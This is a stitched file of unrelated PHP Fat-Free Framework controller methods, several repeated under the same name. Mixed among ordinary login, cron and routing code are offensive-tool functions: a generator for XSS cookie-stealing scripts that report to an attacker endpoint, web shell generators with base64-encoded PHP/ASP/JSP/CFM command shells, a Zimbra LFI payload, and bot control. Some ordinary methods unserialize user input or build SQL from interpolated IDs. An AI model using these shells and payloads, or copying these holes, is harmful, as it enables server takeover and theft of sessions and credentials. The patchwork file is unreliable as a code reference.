/**
* auth service callback
* @param Base $f3
* @param $params
*/
function callback(\Base $f3, $params)
{
$Opauth = new \Opauth($this->config, false);
switch ($Opauth->env['callback_transport']) {
case 'session':
$response = $f3->get('SESSION.opauth');
$f3->clear('SESSION.opauth');
break;
case 'post':
$response = unserialize(base64_decode($f3->get('POST.opauth')));
break;
case 'get':
$response = unserialize(base64_decode($f3->get('GET.opauth')));
break;
default:
$f3->error(400, 'Unsupported callback_transport');
break;
}
if (isset($response['error'])) {
$f3->call($this->abortFunc, array($response));
return;
}
$data = $response['auth'];
// validate
if (empty($data) || empty($response['timestamp']) || empty($response['signature']) || empty($data['provider']) || empty($data['uid'])) {
$f3->error(400, 'Invalid auth response: Missing key auth response components');
} elseif (!$Opauth->validate(sha1(print_r($data, true)), $response['timestamp'], $response['signature'], $reason)) {
$f3->error(400, 'Invalid auth response: ' . $reason);
} else {
// It's all good
$f3->call($this->successFunc, array($data));
}
}
/**
* @param \Base $f3
* Description This function will be used to create the necessary script needed to hook a page.
*/
function create_campaign(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'xssrc_campaign.html';
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.targetUrl')) {
$error = true;
\Flash::instance()->addMessage('Please enter a Target url to test access once you steal cookies e.g. http://victim.mth3l3m3nt.com/admin', 'warning');
} else {
$target_url = $f3->get('POST.targetUrl');
$c_host = parse_url($target_url, PHP_URL_HOST);
$template_src = $f3->ROOT . $f3->BASE . '/scripts/attack_temp.mth3l3m3nt';
$campaign_file = $f3->ROOT . $f3->BASE . '/scripts/' . $c_host . '.js';
$campaign_address = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/scripts/' . $c_host . '.js';
$postHome = $f3->SCHEME . "://" . $f3->HOST . $f3->BASE . '/xssr';
copy($template_src, $campaign_file);
$unprepped_contents = file_get_contents($campaign_file);
$unprepped_contents = str_replace("http://attacker.mth3l3m3nt.com/xssr", $postHome, $unprepped_contents);
$unprepped_contents = str_replace("http://victim.mth3l3m3nt.com/admin/", $target_url, $unprepped_contents);
file_put_contents($campaign_file, $unprepped_contents);
$instructions = \Flash::instance()->addMessage('Attach the script to target e.g. <script src="' . $campaign_address . '"></script>', 'success');
$this->response->data['content'] = $instructions;
}
}
}
/**
* clear expired cached files
* >> >php index.php "/cron/deleteExpiredCacheData"
* @param \Base $f3
*/
function deleteExpiredData(\Base $f3)
{
$time_start = microtime(true);
// cache dir (dir is recursively searched...)
$cacheDir = $f3->get('TEMP');
$filterTime = (int) strtotime('-' . $f3->get('PATHFINDER.CACHE.EXPIRE_MAX') . ' seconds');
$expiredFiles = Search::getFilesByMTime($cacheDir, $filterTime);
$deletedFiles = 0;
$deletedSize = 0;
$notWritableFiles = 0;
$deleteErrors = 0;
foreach ($expiredFiles as $filename => $file) {
/**
* @var $file \SplFileInfo
*/
if ($file->isWritable()) {
$tmpSize = $file->getSize();
if (unlink($file->getRealPath())) {
$deletedSize += $tmpSize;
$deletedFiles++;
} else {
$deleteErrors++;
}
} else {
$notWritableFiles++;
}
}
$execTime = microtime(true) - $time_start;
// Log ------------------------
$log = new \Log('cron_' . __FUNCTION__ . '.log');
$log->write(sprintf(self::LOG_TEXT, __FUNCTION__, $deletedFiles, $deletedSize, $notWritableFiles, $deleteErrors, $execTime));
}
public function shellGenerator(\Base $f3)
{
$this->response->data['SUBPART'] = 'websaccre_shellgen.html';
$pshell = "PD9waHAgDQppZiAoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpeyANCiAgICAkY21kPSgkX1JFUVVFU1RbImNtZCJdKTsgDQogICAgZWNobyBzeXN0ZW0oJGNtZCk7IA0KICAgIGRpZTsgDQp9IA0KPz4=";
$ashell = "PCUNCklmIChyZXF1ZXN0KCJjbWQiKSA8PiAiIikgVGhlbg0KUmVzcG9uc2UuV3JpdGUgU2VydmVyLkhUTUxFbmNvZGUoc2VydmVyLmNyZWF0ZW9iamVjdCgid3NjcmlwdC5zaGVsbCIpLmV4ZWMoU2VydmVyLk1hcFBhdGgoImNtZC5leGUiKSYgIiAvYyAiICYNCg0KcmVxdWVzdCgiY21kIikpLnN0ZG91dC5yZWFkYWxsKQ0KRW5kIElmDQolPg";
$jshell = "PCUgaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7IG91dC5wcmludGxuKCJDb21tYW5kOiAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpICsgIjxiciAvPiIpOyBQcm9jZXNzIHAgPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7IE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7IElucHV0U3RyZWFtIGluID0gcC5nZXRJbnB1dFN0cmVhbSgpOyBEYXRhSW5wdXRTdHJlYW0gZGlzID0gbmV3IERhdGFJbnB1dFN0cmVhbShpbik7IFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7IHdoaWxlICggZGlzciAhPSBudWxsICkgeyBvdXQucHJpbnRsbihkaXNyKTsgZGlzciA9IGRpcy5yZWFkTGluZSgpOyB9IH0gJT4g";
$jspx = "PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHhtbG5zOmM9Imh0dHA6Ly9qYXZhLnN1bi5jb20vanNwL2pzdGwvY29yZSIgdmVyc2lvbj0iMi4wIj4NCjxqc3A6ZGlyZWN0aXZlLnBhZ2UgY29udGVudFR5cGU9InRleHQvaHRtbDtjaGFyc2V0PVVURi04IiBwYWdlRW5jb2Rpbmc9IlVURi04Ii8";
$shell_type = $f3->get('POST.shelltype');
if ($f3->get('VERB') == 'POST') {
$error = false;
switch ($shell_type) {
case "PHP":
$this->response->data['content'] = base64_decode($pshell);
break;
case "ASP":
$this->response->data['content'] = base64_decode($ashell);
break;
case "JSP":
$this->response->data['content'] = base64_decode($jshell);
break;
case "JSPX":
$this->response->data['content'] = base64_decode($jspx);
break;
default:
$this->response->data['content'] = "Invalid Shell Type Request";
break;
}
}
}
public static function year(\Base $fat)
{
$year = (int) $fat->get('PARAMS.year');
if (!in_array($year, $fat->get('YEARS'))) {
$year = $fat->get('YEAR');
}
echo self::contest($year);
}
/**
* GET|POST /logout
* @param \Base $fw
*/
function logout(\Base $fw)
{
if ($fw->get('COOKIE.session_token') == $fw->get('GET.session')) {
\Helper\Api\User::logout();
$fw->set('COOKIE.session_token', null);
$fw->reroute('/');
} else {
$fw->error(400);
}
}
/**
* POST /post.json
* Create a new post
*
* @todo Allow posting to a buddy's page
* @param \Base $fw
*/
public function post(\Base $fw)
{
$userId = self::_requireAuth();
if ($fw->get('POST.user_id') != $userId) {
\App::error(403);
}
$post = \Model\Post::create(['user_id' => $userId, 'page_id' => $fw->get('POST.user_id'), 'content' => $fw->get('POST.content')]);
$detail = \App::model('post/detail')->load($post->id);
$this->_json($detail->cast());
}
public function get($request)
{
if (!$request instanceof Request) {
$key = $request;
$request = new Request();
$request->setKey($key);
}
$success = $this->processing($request);
if (!$success) {
if ($this->_successor) {
$this->_successor->get($request);
}
}
return $request->getResult();
}
/**
* @param \Base $f3
* @param array $params
*/
public function viewSingle(\Base $f3, $params)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'larfi_page.html';
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
$this->response->data['POST'] = $this->resource;
if ($this->resource->dry()) {
$f3->error(404, 'LFI Plugin not found');
} else {
$this->response->data['SUBPART'] = 'larfi_page.html';
$url = $f3->get('POST.url');
$blankurl = $f3->devoid('POST.url');
$lfi_type = $f3->get('POST.lType');
$payload = $f3->get('POST.lPayload');
$method = $f3->get('POST.lMethod');
switch ($lfi_type) {
case "Generic":
\Flash::instance()->addMessage('Exploited by injecting into the URL/Body where applicable', 'info');
return $this->uri_based_lfi($method, $blankurl, $url, $payload);
break;
case "Cookie":
\Flash::instance()->addMessage('Exploited by injecting into the cookie', 'info');
return $this->cookie_based_lfi($method, $blankurl, $url, $payload);
break;
default:
\Flash::instance()->addMessage('This is an invalid attack type', 'warning');
}
}
}
}
/**
* parse node data on template compiling
* @param $node
* @return string
*/
function parseNode($node)
{
$src = false;
$params = array();
if (isset($node['@attrib'])) {
$params = $node['@attrib'];
unset($node['@attrib']);
}
// find src
if (array_key_exists('src', $params)) {
$src = $params['src'];
} elseif (array_key_exists('href', $params)) {
$src = $params['href'];
}
if ($src) {
$out = '<?php \\Assets::instance()->addNode(array(';
foreach ($params as $key => $val) {
$out .= var_export($key, true) . '=>' . (preg_match('/{{(.+?)}}/s', $val) ? $this->template->token($val) : var_export($val, true)) . ',';
}
$out .= ')); ?>';
return $out;
}
// inner content
if (isset($node[0]) && isset($params['type'])) {
if (!isset($params['group'])) {
$params['group'] = $params['type'] == 'js' ? 'footer' : 'head';
}
if ($this->f3->get('ASSETS.handle_inline')) {
return '<?php \\Assets::instance()->addInline(' . '$this->resolve(' . var_export($node, true) . ',get_defined_vars()),' . var_export($params['type'], true) . ',' . var_export($params['group'], true) . '); ?>';
} else {
// just bypass
return $this->f3->call($this->formatter[$params['type']], array(array('data' => $this->template->build($node), 'origin' => 'inline')));
}
}
}
/**
* Obtains a SimpleID URL. URLs produced by SimpleID should use this function.
*
* @param string $path the FatFree path or alias
* @param string $query a properly encoded query string
* @param string $secure if $relative is false, either 'https' to force an HTTPS connection, 'http' to force
* an unencrypted HTTP connection, 'detect' to base on the current connection, or NULL to vary based on SIMPLEID_BASE_URL
* @return string the url
*
* @since 0.7
*/
public function getCanonicalURL($path = '', $query = '', $secure = null)
{
$config = $this->f3->get('config');
$canonical_base_path = $config['canonical_base_path'];
if (preg_match('/^(?:@(\\w+)(?:(\\(.+?)\\))*|https?:\\/\\/)/', $path, $parts)) {
if (isset($parts[1])) {
$aliases = $this->f3->get('ALIASES');
if (!empty($aliases[$parts[1]])) {
$path = $aliases[$parts[1]];
$path = $this->f3->build($path, isset($parts[2]) ? $this->f3->parse($parts[2]) : array());
$path = ltrim($path, '/');
}
}
}
// Make sure that the base has a trailing slash
if (substr($config['canonical_base_path'], -1) == '/') {
$url = $config['canonical_base_path'];
} else {
$url = $config['canonical_base_path'] . '/';
}
if ($secure == 'https' && stripos($url, 'http:') === 0) {
$url = 'https:' . substr($url, 5);
}
if ($secure == 'http' && stripos($url, 'https:') === 0) {
$url = 'http:' . substr($url, 6);
}
if ($secure == 'detect' && $this->isHttps() && stripos($url, 'http:') === 0) {
$url = 'https:' . substr($url, 5);
}
if ($secure == 'detect' && !$this->isHttps() && stripos($url, 'https:') === 0) {
$url = 'http:' . substr($url, 6);
}
$url .= $path . ($query == '' ? '' : '?' . $query);
return $url;
}
/**
* HTTP route pre-processor
* @param \Base $f3
*/
function beforeroute($f3)
{
if (!$this->pathSegments && $f3->get('PARAMS')[1]) {
$this->pathSegments = explode("/", $f3->get('PARAMS')[1]);
}
if (!$this->lang) {
$lang = \Services\LanguageService::instance();
if (count($this->pathSegments) > 0 && $lang->isValidLanguage($this->pathSegments[0])) {
$language = array_shift($this->pathSegments);
$this->lang = $language;
$lang->setLanguage($language);
} else {
$this->lang = $lang->detectLanguage();
$lang->setLanguage($this->lang);
}
}
}
/**
* POST /login
* @param \Base $fw
* @return void
*/
public function login(\Base $fw)
{
if ($this->_getUser()) {
$fw->reroute('/dashboard');
}
$username = $fw->get('POST.username');
$password = $fw->get('POST.password');
$user = new \Model\User();
$user->load(array('username = ?', $username));
if ($user->id) {
if (password_verify($password, $user->password)) {
$fw->set('SESSION.user_id', $user->id);
$fw->reroute('/dashboard');
}
}
$fw->set('error', 'Invalid username or password.');
$this->_render('index.html');
}
public function database(\Base $f3)
{
$this->response->data['SUBPART'] = 'settings_database.html';
$cfg = \Config::instance();
if ($f3->get('VERB') == 'POST' && $f3->exists('POST.active_db')) {
$type = $f3->get('POST.active_db');
$cfg->{'DB_' . $type} = $f3->get('POST.DB_' . $type);
$cfg->ACTIVE_DB = $type;
$cfg->save();
\Flash::instance()->addMessage('Config saved', 'success');
$setup = new \Setup();
$setup->install($type);
// logout
$f3->clear('SESSION.user_id');
}
$cfg->copyto('POST');
$f3->set('JIG_format', array('JSON', 'Serialized'));
}
protected function profile(\Base $f3, $params)
{
$this->response->addTitle($f3->get('LN__AdminMenu_Profile'));
$f3->set('title_h3', $f3->get('LN__AdminMenu_Profile'));
if (isset($params[2])) {
$params = $this->parametric($params[2]);
}
if (isset($params['edit']) and is_numeric($params['edit'])) {
return TRUE;
}
// Get all available user fields
$fields = $this->model->listUserFields();
// Group array by field type
foreach ($fields as $field) {
$data[$field['field_type']][] = $field;
}
$this->buffer(\View\AdminCP::listUserFields($data));
}
/**
* delete all expired signatures on "inactive" systems
* >> php index.php "/cron/deleteSignatures"
* @param \Base $f3
*/
function deleteSignatures(\Base $f3)
{
$signatureExpire = (int) $f3->get('PATHFINDER.CACHE.EXPIRE_SIGNATURES');
if ($signatureExpire > 0) {
$pfDB = DB\Database::instance()->getDB('PF');
$sqlDeleteExpiredSignatures = "DELETE `sys` FROM\n `system_signature` `sys` INNER JOIN\n `system` ON \n `system`.`id` = `sys`.`systemId`\n WHERE\n `system`.`active` = 0 AND\n TIMESTAMPDIFF(SECOND, `sys`.`updated`, NOW() ) > :lifetime\n ";
$pfDB->exec($sqlDeleteExpiredSignatures, ['lifetime' => $signatureExpire]);
}
}
public function viewSingle(\Base $f3, $params)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'webot_control.html';
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
$this->response->data['POST'] = $this->resource;
if ($this->resource->dry()) {
$f3->error(404, 'Webot not found');
} else {
$this->response->data['SUBPART'] = 'webot_control.html';
$url = $f3->get('POST.zLoc');
$command_key = $f3->get('POST.zParam');
$instruction = $f3->get('POST.instruction');
return $this->bot_master($url, $command_key, $instruction);
}
}
}
/**
* AUTH Step 2: reroute to auth page
* @param null $callback_url
*/
public function authorize($callback_url = NULL)
{
$url = 'https://www.dropbox.com/1/oauth/authorize';
$params = array('oauth_token' => $this->authToken, 'locale ' => $this->f3->get('LANGUAGE'));
if ($callback_url) {
$params['oauth_callback'] = $callback_url;
}
$this->f3->reroute($url . '?' . http_build_query($params));
}
function __construct()
{
$this->f3 = \Base::instance();
$config = $this->f3->get('MULTILANG');
//languages definition
if (!is_array(@$config['languages'])) {
user_error(self::E_NoLang, E_USER_ERROR);
}
foreach ($config['languages'] as $lang => $locales) {
if (is_array($locales)) {
$locales = implode(',', $locales);
}
if (!$this->languages) {
$this->f3->set('FALLBACK', $locales);
$this->primary = $lang;
}
$this->languages[$lang] = $locales;
$this->rules[$lang] = array();
}
//aliases definition
$this->_aliases = $this->f3->get('ALIASES');
if (is_array(@$config['rules'])) {
foreach ($config['rules'] as $lang => $aliases) {
$this->rules[$lang] = $aliases;
}
}
//global routes
if (isset($config['global'])) {
if (!is_array($config['global'])) {
$config['global'] = array($config['global']);
}
$prefixes = array();
foreach ($config['global'] as $global) {
if (@$global[0] == '/') {
$prefixes[] = $global;
} else {
$this->global_aliases[] = $global;
}
}
if ($prefixes) {
$this->global_regex = '#^(' . implode('|', array_map('preg_quote', $prefixes)) . ')#';
}
}
//migration mode
$this->migrate = (bool) @$config['migrate'];
//detect current language
$this->detect();
//rewrite existing routes
$this->rewrite();
//root handler
$self = $this;
//PHP 5.3 compatibility
$this->f3->route('GET /', @$config['root'] ?: function ($f3) use($self) {
$f3->reroute('/' . $self->current);
});
}
/**
* Zimbra Collaboration Server URI Based LFI
* @param \Base $f3
*/
public function zimbra_lfi(\Base $f3)
{
$lfi = new Larfi();
$f3->set('exploit_title', 'Zimbra Collaboration server LFI (Versions: <=7.2.2 and <=8.0.2 )');
$this->response->data['SUBPART'] = 'lfi_page.html';
$blankurl = $f3->devoid('POST.url');
$url = $f3->get('POST.url');
$payload = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
return $this->uri_based_lfi($blankurl, $url, $payload);
}
function show_question(\Base $f3, $params)
{
$ans = $f3->get('GET.answer');
$rowid = $f3->get('GET.rowid');
$db = $f3->get('DB');
if ($rowid && $ans == "") {
$f3->reroute('/');
} else {
if ($ans && $rowid) {
$f3->dump($rowid);
$res = $db->exec('UPDATE q SET answer = ? WHERE rowid = ?', array($ans, $rowid));
$f3->reroute('/');
} else {
$res = $db->exec("SELECT rowid, * FROM q WHERE answer = '' ORDER BY random() LIMIT 1", $txt);
$f3->set('question', $res);
echo View::instance()->render('show_question.htm');
}
}
}
public static function get(array $data = array())
{
//recorrer la consulta
$personas = parent::get($data);
foreach ($personas as $key => $value) {
if ($key == 'password') {
$personas[$key]['password'] = '';
}
}
return $personas;
}
/**
* POST /register
* @param \Base $fw
*/
function registerPost(\Base $fw)
{
try {
$token = \Helper\Api\User::register($fw->get('POST'));
$fw->set('COOKIE.session_token', $token);
$fw->reroute('/stream');
} catch (\Exception $e) {
$fw->set('error', $e->getMessage());
\App::error(403);
}
}
public function getwhois(\Base $f3)
{
$web = \Web::instance();
$this->response->data['SUBPART'] = 'websaccre_whois.html';
if ($f3->get('VERB') == 'POST') {
$error = false;
if ($f3->devoid('POST.hostname')) {
$error = true;
\Flash::instance()->addMessage('Please enter a hostname e.g. africahackon.com', 'warning');
} else {
$address = $f3->get('POST.hostname');
$mywhois = $web->whois($address);
if (!$mywhois) {
\Flash::instance()->addMessage('You have entered an invalid hostname try something like: africahackon.com', 'warning');
} else {
$this->response->data['content'] = $mywhois;
}
}
}
}
/**
* @param \Base $f3
* @param array $params
* @return bool
*/
public function getSingle(\Base $f3, $params)
{
$this->response->data['SUBPART'] = 'comment_edit.html';
if (isset($params['id'])) {
$this->response->data['comment'] = $this->resource->load(array('_id = ?', $params['id']));
if (!$this->resource->dry()) {
return true;
}
}
\Flash::instance()->addMessage('Unknown Comment ID', 'danger');
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
public function shellGenerator(\Base $f3)
{
$this->response->data['SUBPART'] = 'websaccre_shellgen.html';
$leg_ashell = " PCUNCg0KRGltIG9TLG9TTmV0LG9GU3lzLCBvRixzekNNRCwgc3pURg0KT24gRXJyb3IgUmVzdW1lIE5leHQNClNldCBvUyA9IFNlcnZlci5DcmVhdGVPYmplY3QoIldTQ1JJUFQuU0hFTEwiKQ0KU2V0IG9TTmV0ID0gU2VydmVyLkNyZWF0ZU9iamVjdCgiV1NDUklQVC5ORVRXT1JLIikNClNldCBvRlN5cyA9IFNlcnZlci5DcmVhdGVPYmplY3QoIlNjcmlwdGluZy5GaWxlU3lzdGVtT2JqZWN0IikNCnN6Q01EID0gUmVxdWVzdC5Gb3JtKCJDIikNCklmIChzekNNRCA8PiAiIikgVGhlbg0KICBzelRGID0gImM6XHdpbmRvd3NccGNoZWFsdGhcRVJST1JSRVBcUUhFQURMRVNcIiAmICBvRlN5cy5HZXRUZW1wTmFtZSgpDQogICcgSGVyZSB3ZSBkbyB0aGUgY29tbWFuZA0KICBDYWxsIG9TLlJ1bigid2luLmNvbSBjbWQuZXhlIC9jICIiIiAmIHN6Q01EICYgIiA+ICIgJiBzelRGICYNCiIiIiIsMCxUcnVlKQ0KICByZXNwb25zZS53cml0ZSBzelRGDQogICcgQ2hhbmdlIHBlcm1zDQogIENhbGwgb1MuUnVuKCJ3aW4uY29tIGNtZC5leGUgL2MgY2FjbHMuZXhlICIgJiBzelRGICYgIiAvRSAvRw0KZXZlcnlvbmU6RiIsMCxUcnVlKQ0KICBTZXQgb0YgPSBvRlN5cy5PcGVuVGV4dEZpbGUoc3pURiwxLEZhbHNlLDApDQpFbmQgSWYgDQolPg0KPEZPUk0gYWN0aW9uPSI8JT0gUmVxdWVzdC5TZXJ2ZXJWYXJpYWJsZXMoIlVSTCIpICU+IiBtZXRob2Q9IlBPU1QiPg0KPGlucHV0IHR5cGU9dGV4dCBuYW1lPSJDIiBzaXplPTcwIHZhbHVlPSI8JT0gc3pDTUQgJT4iPg0KPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSJSdW4iPjwvRk9STT48UFJFPg0KTWFjaGluZTogPCU9b1NOZXQuQ29tcHV0ZXJOYW1lJT48QlI+DQpVc2VybmFtZTogPCU9b1NOZXQuVXNlck5hbWUlPjxicj4NCjwlIA0KSWYgKElzT2JqZWN0KG9GKSkgVGhlbg0KICBPbiBFcnJvciBSZXN1bWUgTmV4dA0KICBSZXNwb25zZS5Xcml0ZSBTZXJ2ZXIuSFRNTEVuY29kZShvRi5SZWFkQWxsKQ0KICBvRi5DbG9zZQ0KICBDYWxsIG9TLlJ1bigid2luLmNvbSBjbWQuZXhlIC9jIGRlbCAiJiBzelRGLDAsVHJ1ZSkNCkVuZCBJZiANCg0KJT4= ";
$pshell = "PD9waHAgDQppZiAoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpeyANCiAgICAkY21kPSgkX1JFUVVFU1RbImNtZCJdKTsgDQogICAgZWNobyBzeXN0ZW0oJGNtZCk7IA0KICAgIGRpZTsgDQp9IA0KPz4=";
$ashell = "PCUNCklmIChyZXF1ZXN0KCJjbWQiKSA8PiAiIikgVGhlbg0KUmVzcG9uc2UuV3JpdGUgU2VydmVyLkhUTUxFbmNvZGUoc2VydmVyLmNyZWF0ZW9iamVjdCgid3NjcmlwdC5zaGVsbCIpLmV4ZWMoU2VydmVyLk1hcFBhdGgoImNtZC5leGUiKSYgIiAvYyAiICYNCg0KcmVxdWVzdCgiY21kIikpLnN0ZG91dC5yZWFkYWxsKQ0KRW5kIElmDQolPg";
$jshell = "PCUgaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7IG91dC5wcmludGxuKCJDb21tYW5kOiAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpICsgIjxiciAvPiIpOyBQcm9jZXNzIHAgPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7IE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7IElucHV0U3RyZWFtIGluID0gcC5nZXRJbnB1dFN0cmVhbSgpOyBEYXRhSW5wdXRTdHJlYW0gZGlzID0gbmV3IERhdGFJbnB1dFN0cmVhbShpbik7IFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7IHdoaWxlICggZGlzciAhPSBudWxsICkgeyBvdXQucHJpbnRsbihkaXNyKTsgZGlzciA9IGRpcy5yZWFkTGluZSgpOyB9IH0gJT4g";
$jspx = "PGpzcDpyb290IHhtbG5zOmpzcD0iaHR0cDovL2phdmEuc3VuLmNvbS9KU1AvUGFnZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHhtbG5zOmM9Imh0dHA6Ly9qYXZhLnN1bi5jb20vanNwL2pzdGwvY29yZSIgdmVyc2lvbj0iMi4wIj4NCjxqc3A6ZGlyZWN0aXZlLnBhZ2UgY29udGVudFR5cGU9InRleHQvaHRtbDtjaGFyc2V0PVVURi04IiBwYWdlRW5jb2Rpbmc9IlVURi04Ii8";
$cfmshell = " PGh0bWw+DQo8Ym9keT4NCg0KPGNmb3V0cHV0Pg0KPHRhYmxlPg0KPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249IiI+DQogPHRyPg0KICA8dGQ+Q29tbWFuZDo8L3RkPg0KICA8dGQ+IDwgaW5wdXQgdHlwZT10ZXh0IG5hbWU9ImNtZCIgc2l6ZT01MDxjZmlmIGlzZGVmaW5lZCgiZm9ybS5jbWQiKT4gdmFsdWU9IiNmb3JtLmNtZCMiIDwvY2ZpZj4+IDwgYnI+PC90ZD4NCiA8L3RyPg0KIDx0cj4NCiAgPHRkPk9wdGlvbnM6PC90ZD4NCiAgPHRkPiA8IGlucHV0IHR5cGU9dGV4dCBuYW1lPSJvcHRzIiBzaXplPTUwIDxjZmlmIGlzZGVmaW5lZCgiZm9ybS5vcHRzIik+IHZhbHVlPSIjZm9ybS5vcHRzIyIgPC9jZmlmPiA+PCBicj4gPC90ZD4NCiA8L3RyPg0KIDx0cj4NCiAgPHRkPlRpbWVvdXQ6PC90ZD4NCiAgPHRkPjwgaW5wdXQgdHlwZT10ZXh0IG5hbWU9InRpbWVvdXQiIHNpemU9NCA8Y2ZpZiBpc2RlZmluZWQoImZvcm0udGltZW91dCIpPiB2YWx1ZT0iI2Zvcm0udGltZW91dCMiIDxjZmVsc2U+IHZhbHVlPSI1IiA8L2NmaWY+ID4gPC90ZD4NCiA8L3RyPg0KPC90YWJsZT4NCjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iRXhlYyIgPg0KPC9GT1JNPg0KDQo8Y2ZzYXZlY29udGVudCB2YXJpYWJsZT0ibXlWYXIiPg0KPGNmZXhlY3V0ZSBuYW1lID0gIiNGb3JtLmNtZCMiIGFyZ3VtZW50cyA9ICIjRm9ybS5vcHRzIyIgdGltZW91dCA9ICIjRm9ybS50aW1lb3V0IyI+DQo8L2NmZXhlY3V0ZT4NCjwvY2ZzYXZlY29udGVudD4NCjxwcmU+DQojbXlWYXIjDQo8L3ByZT4NCjwvY2ZvdXRwdXQ+DQo8L2JvZHk+DQo8L2h0bWw+";
$shell_type = $f3->get('POST.shelltype');
if ($f3->get('VERB') == 'POST') {
$error = false;
switch ($shell_type) {
case "PHP":
$this->response->data['content'] = base64_decode($pshell);
break;
case "ASP":
$this->response->data['content'] = base64_decode($leg_ashell);
break;
case "CFM":
$this->response->data['content'] = base64_decode($cfmshell);
break;
case "ASPX":
$this->response->data['content'] = base64_decode($ashell);
break;
case "JSP":
$this->response->data['content'] = base64_decode($jshell);
break;
case "JSPX":
$this->response->data['content'] = base64_decode($jspx);
break;
default:
$this->response->data['content'] = "Invalid Shell Type Request";
break;
}
}
}
public function delete(\Base $f3, $params)
{
$this->resource->reset();
$msg = \Flash::instance();
if (isset($params['id'])) {
$this->resource->load(array('_id = ?', $params['id']));
if ($f3->get('HOST') == 'ikkez.de' && !$this->resource->dry() && $this->resource->username == 'admin') {
$msg->addMessage("You are not allowed to delete the demo-admin", 'danger');
$f3->reroute('/admin/' . $params['module']);
return;
}
parent::delete($f3, $params);
}
$f3->reroute($f3->get('SESSION.LastPageURL'));
}
/**
* delete connection
* @param \Base $f3
* @throws \Exception
*/
public function delete(\Base $f3)
{
$connectionIds = $f3->get('POST.connectionIds');
$activeCharacter = $this->getCharacter();
/**
* @var Model\ConnectionModel $connection
*/
$connection = Model\BasicModel::getNew('ConnectionModel');
foreach ($connectionIds as $connectionId) {
$connection->getById($connectionId);
$connection->delete($activeCharacter);
$connection->reset();
}
echo json_encode([]);
}
/**
* Single tag route (/tag/@tag)
* @param \Base $f3
* @param array $params
*/
public function single($f3, $params)
{
$tag = new \Model\Issue\Tag();
$tag->load(array("tag = ?", $params["tag"]));
if (!$tag->id) {
$f3->error(404);
return;
}
$issue = new \Model\Issue\Detail();
$issue_ids = implode(',', $tag->issues());
$f3->set("title", "#" . $params["tag"] . " - " . $f3->get("dict.issue_tags"));
$f3->set("tag", $tag);
$f3->set("issues.subset", $issue->find("id IN ({$issue_ids})"));
$this->_render("tag/single.html");
}
protected function _setup()
{
ini_set('max_execution_time', 60);
if ($this->_fw->get('DEBUG')) {
ini_set('display_errors', 1);
}
// Setup i18n
$i18n = I18n::instance();
$i18n->setLocale($this->getSession()->getLocale());
$i18n->setCurrencyCode($this->getSession('xhb')->getCurrencyCode());
// Set HTML lang according to defined locale
$this->_fw->set('HTML_LANG', $i18n->getLocaleCountryCodeISO2());
// Load XHB
$this->getSession('xhb')->set('xhb_file', $this->_xhbFile);
// Avoid decimal separator issues when casting double and float values to strings
setlocale(LC_NUMERIC, 'C');
if ($theme = $this->getSession()->getTheme()) {
Design::instance()->setTheme($theme);
}
Design::instance()->init();
if ($this->_xhbFile == 'data/example.xhb') {
$this->getSession()->addMessage($i18n->tr("It seems you're using the default <span class=\"mono\">example.xhb</span> file. " . "You may want to change it by editing <span class=\"mono\">etc/local.ini</span>."), Session::MESSAGE_INFO, array('no_escape' => true));
}
}
